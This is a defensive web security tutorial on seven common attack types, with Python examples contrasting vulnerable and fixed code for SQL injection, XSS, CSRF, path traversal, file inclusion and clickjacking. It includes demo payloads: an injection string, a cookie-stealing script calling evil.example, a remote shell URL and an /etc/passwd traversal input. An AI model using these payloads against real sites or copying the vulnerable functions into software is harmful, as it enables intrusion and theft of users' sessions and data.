Web Security – Different types of attacks
By: Tung Tram

Web security is an interesting topic, and anyone who works on web development should pay attention to it as well. Ineffective web security leads to the problems we hear about most often on the web: spam, viruses, identity theft and so on.

A report from Cenzic, a web security company, gives an overall look at the different types of web attacks and the percentage of attacks on the Internet that each type accounts for.
 
 
Let's go through each of these and explain what they are and what they do.
 
1. SQL Injection
With SQL injection, an attacker reaches your database by sending input, through the URI or a form field, that your code concatenates into an SQL statement. A quote or comment sequence in that input ends the value, and the rest of the input runs as SQL, so the attacker can read, change or delete data the query was never meant to touch. You can find more information about SQL injection here - http://en.wikipedia.org/wiki/SQL_injection.
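An added example, not code from the original article, showing the flaw and the fix side by side. The article's server-side examples refer to PHP; this uses Python with an in-memory SQLite database as a stand-in, and the users table, the credentials and the INJECTION string are all constructed for the demo.

```python
import sqlite3

# Constructed sample database for the demo; not from the original page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # The classic mistake: request values are pasted into the SQL text, so a
    # quote in the input ends the string literal and the rest of the input
    # becomes SQL syntax.
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    # Parameterised query: the statement is fixed and the driver binds the
    # values separately, so the same input is compared as a literal string.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# A password field value that turns the WHERE clause into
#   ... AND password = '' OR '1'='1'
# which is true for every row, so the first user is returned.
INJECTION = "' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "nobody", INJECTION))  # alice: logged in without a password
    print(login_safe(conn, "nobody", INJECTION))        # None
```

The same pattern applies to every driver: never build the statement text from request data; pass values as parameters and let the driver quote them.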
 
2. Cross-Site Scripting (XSS)
Cross-site scripting is probably the biggest and most common problem. With it, an attacker gets JavaScript into your document by placing it in a URI parameter or a form field that your page writes back into its HTML without encoding; the victim's browser then runs that script as part of your site, with access to its cookies and page content.
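An added example, not from the original article, of a reflected XSS flaw and its fix in Python (standing in for the PHP the article mentions). The search page, the PAYLOAD string and the evil.example host are constructed for the demo. It also goes one step beyond the paragraph: encoding alone does not make a user-supplied link target safe, so the link case is handled separately.

```python
import html
from urllib.parse import urlsplit

def render_search_vulnerable(query):
    # Untrusted input concatenated straight into the page: whatever markup the
    # attacker put in the "q" parameter is parsed by the victim's browser as
    # part of the site's own HTML, and any <script> in it runs with access to
    # the site's cookies and DOM.
    return "<p>Results for: %s</p>" % query

def render_search_safe(query):
    # Encode the HTML metacharacters (&, <, >, " and ') for the element-content
    # context so the input is shown as text and never parsed as markup.
    return "<p>Results for: %s</p>" % html.escape(query, quote=True)

def safe_href(url):
    # Escaping is not enough for a link target: "javascript:alert(1)" contains
    # no HTML metacharacters at all. Allow only http(s) URLs, then escape for
    # the attribute context.
    scheme = urlsplit(url.strip()).scheme
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)

# Constructed attacker input: a reflected XSS payload that exfiltrates cookies.
PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'

if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))  # the <script> tag lands in the page
    print(render_search_safe(PAYLOAD))        # &lt;script&gt;... is shown as text
    print(safe_href("javascript:alert(1)"))   # "#"
```

The rule behind both functions: encode for the context you are writing into (element text, attribute value, URL, JavaScript string), at the point of output, for every value that came from a request.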
 
3. Path Traversal
Allowing path or directory traversal on your server is an amazingly bad idea. If a request parameter is used as a file name without being checked, an attacker can walk out of the intended folder with sequences such as ../ and list or read files elsewhere on the server. This lets attackers reach folders with sensitive information (configuration files, credentials, source code) or website functionality and have some fun.
 
4. Cross-Site Request Forgery
Cross-site request forgery (CSRF) exploits browsers and websites that allow functionality to be called without any proof that the actual user initiated it. The browser attaches the user's cookies to every request to your site, including one triggered by a form or image on a page the attacker controls, so a logged-in victim who merely visits that page silently performs the action.
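An added example, not from the original article, of the standard defence: a per-session secret token that a forged cross-site request cannot supply. Python stands in for the article's PHP; the session dict, the /transfer form and the form field names are constructed for the demo.

```python
import hmac
import html
import secrets

def issue_csrf_token(session):
    # One random token per session, stored server-side and embedded in every
    # state-changing form as a hidden field. A third-party page can make the
    # victim's browser send the cookies, but it cannot read this value.
    token = session.get("csrf_token")
    if token is None:
        token = secrets.token_urlsafe(32)
        session["csrf_token"] = token
    return token

def csrf_token_valid(session, submitted):
    expected = session.get("csrf_token")
    if expected is None or submitted is None:
        return False
    # Constant-time comparison so the check does not leak the token byte by byte.
    return hmac.compare_digest(expected.encode(), submitted.encode())

def transfer_form_html(session):
    # The legitimate form: the token travels inside the page the user loaded.
    token = html.escape(issue_csrf_token(session), quote=True)
    return ('<form method="post" action="/transfer">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="to"><input name="amount"><button>Send</button></form>' % token)

def handle_transfer(session, form):
    # session stands in for whatever the cookie identifies server-side; form is
    # the parsed POST body. A real submission and a forged one both arrive with
    # the victim's cookies, so only the token tells them apart.
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, "rejected: missing or invalid CSRF token"
    return 200, "sent %s to %s" % (form["amount"], form["to"])

if __name__ == "__main__":
    session = {}
    print(handle_transfer(session, {"to": "mallory", "amount": "1000"}))  # (403, ...)
    token = issue_csrf_token(session)
    print(handle_transfer(session, {"to": "bob", "amount": "10", "csrf_token": token}))  # (200, ...)
```

The token must be unpredictable and must never be sent in a cookie alone, because cookies are exactly what the forged request already carries. Marking the session cookie SameSite is a useful second layer but does not replace the token.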
 
5. Remote File Inclusion (RFI)
With remote file inclusion or code injection, an attacker uses a flaw in your website to pull in code from another server and run it on yours. It is in the same family as XSS but much more problematic, because the attacker gets full access to your server (with JavaScript, you can steal cookies and call other code, but you can't access the file system without resorting to tricks with Flash or Java applets).
 
Any code reaching your server through an unchecked variable passed to an include() call, for example, can run server commands: upload, download and transfer data to other servers, read your server passwords and user names, anything you can do on the command line via PHP or ASP if your server allows it.
 
This is probably the worst thing that can happen to your server, because with command-line access an attacker can turn it into an attack machine for a network attack on other servers, silently listen to everything you and your users do on the server and send it to another web resource, store information and viruses for distribution, inject spam links, you name it.
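An added example, not from the original article, that serves both the path traversal section above and the file inclusion section here, since both come down to a request value being used as a file path. Python stands in for the PHP include() the article mentions; the PAGES allowlist, the page names and the sample inputs are constructed for the demo.

```python
import os
import tempfile
from urllib.parse import urlsplit

def resolve_under(base_dir, user_path):
    # Canonicalise both the document root and the requested path, then accept
    # only a result that is still inside the root. "../" sequences, absolute
    # paths and symlinks pointing outside all collapse to a path that fails.
    if "\x00" in user_path:
        return None  # embedded NUL byte, a classic trick to cut the path short
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None

# Allowlist for a "?page=" parameter, constructed for the example. Mapping the
# parameter to a fixed filename means the request value is never used as a
# path or URL at all, which is the fix for include($_GET['page']).
PAGES = {"home": "home.php", "about": "about.php"}

def include_target(base_dir, page):
    filename = PAGES.get(page)
    if filename is None:
        return None
    return resolve_under(base_dir, filename)

def looks_remote(value):
    # Review check for existing code: a request value carrying a URL scheme
    # (http://, ftp://, data:, php://) that reaches include(), fopen() or a
    # similar call is a remote file inclusion candidate.
    return urlsplit(value).scheme != ""

if __name__ == "__main__":
    root = tempfile.gettempdir()  # constructed document root for the demo
    print(resolve_under(root, "pages/about.html"))       # inside root: a path
    print(resolve_under(root, "../../../etc/passwd"))    # None
    print(include_target(root, "http://evil.example/shell.txt"))  # None
    print(looks_remote("http://evil.example/shell.txt"))          # True
```

The allowlist is the stronger of the two controls: resolve_under stops the request from leaving the document root, but include_target stops the request from naming a file at all, which also rules out remote URLs and stream wrappers.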
 
6. Phishing
Phishing is the technique of fooling people into entering information into a bad website. You show end users an interface that looks legitimate (for a bank or what have you) but that in reality sends their information to the attacker's database. Because phishing is a felony, I cannot show you a demo.
 
The trick with phishing is to make the form really look like it comes from a website you trust. You have probably gotten emails saying that your "XYZ bank account" has been compromised, and you know for certain that this isn't the case because you have no account with that bank and may never have heard of it. This is a wild-guess phishing attempt, which is not usually effective.
 
7. Clickjacking
Clickjacking is a terribly clever way to use CSS and inline frames to trick users into clicking something without knowing it. The attacker's page loads your site in an iframe made invisible with CSS (opacity 0) and positions it so that the button the user thinks they are clicking sits exactly over a button on your page. Every action on a website that can be performed with a simple click can be exploited with this trick.
Clickjacking is a massive problem because it is done with CSS, not a script, so there is nothing on the attacker's page for a script blocker to catch. The counter-measure many sites take is a JavaScript "frame-busting" check that refuses to render inside a frame. However, that only helps while JavaScript is on; with JavaScript off, clickjacking still works. The reliable fix is a response header the browser enforces itself, with or without script: X-Frame-Options (DENY or SAMEORIGIN) or the Content-Security-Policy frame-ancestors directive.
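An added example, not from the original article, showing the header-based defence and a check you can run over the headers of your own responses. Python is used as a stand-in for whatever server-side stack emits the headers; the partner origin in the usage is a constructed placeholder.

```python
def anti_framing_headers(allowed_ancestors=()):
    # Response headers that make the browser refuse to render this page inside
    # a frame on another site. The browser enforces them itself, so they work
    # with JavaScript disabled, unlike a frame-busting script.
    ancestors = ["'self'"] + list(allowed_ancestors)
    headers = {"Content-Security-Policy": "frame-ancestors " + " ".join(ancestors)}
    if not allowed_ancestors:
        # Legacy header for browsers without CSP level 2; it cannot express a
        # list of allowed origins, so it is only emitted for the same-origin case.
        headers["X-Frame-Options"] = "SAMEORIGIN"
    return headers

def allows_cross_site_framing(headers):
    # Review check for an existing response: can some other origin frame it?
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split(None, 1)
        name = parts[0].lower() if parts else ""
        value = parts[1] if len(parts) > 1 else ""
        if name == "frame-ancestors":
            # When frame-ancestors is present it takes precedence over
            # X-Frame-Options; an empty source list means 'none'.
            sources = set(value.split())
            return bool(sources - {"'self'", "'none'"})
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return False
    return True  # no protection at all, or the obsolete ALLOW-FROM form

if __name__ == "__main__":
    print(anti_framing_headers())
    print(allows_cross_site_framing({}))                      # True: wide open
    print(allows_cross_site_framing(anti_framing_headers()))  # False
    # constructed partner origin that is deliberately allowed to frame the page
    print(allows_cross_site_framing(anti_framing_headers(["https://partner.example"])))  # True
```

Run the check against the headers of every page that performs an action on a click (transfer, delete, change settings); a True result on one of those pages is a clickjacking exposure.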
 
In the next article, we will discuss how to increase web security.
1/11/2013
Tresor
I will try this month to make a high-quality translation of the MyDLP interface into Russian.
9/13/2012
karthik
nice intro